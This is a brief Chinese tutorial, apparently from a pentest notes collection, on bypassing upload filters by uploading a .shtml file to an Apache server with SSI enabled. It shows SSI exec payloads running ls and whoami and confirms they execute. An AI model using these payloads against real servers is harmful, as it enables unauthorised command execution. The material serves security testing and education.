上传shtml文件--->任意命令执行
在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用<!--#exec cmd="id" -->语法执行任意命令。
SSI即server-side includes,SSI提供了一种对现有HTML文档增加动态内容的方法,不需要编写复杂的JSP/PHP/ASP等程序或者调用CGI程序。
apache httpd 全版本
<!--#exec cmd="ls" -->
<!--#exec cmd="whoami" -->
上传页面
上传1.shtml文件
访问刚才上传的/1.shtml查看上传的文件,ls被执行
上传2.shtml文件
whoami被执行
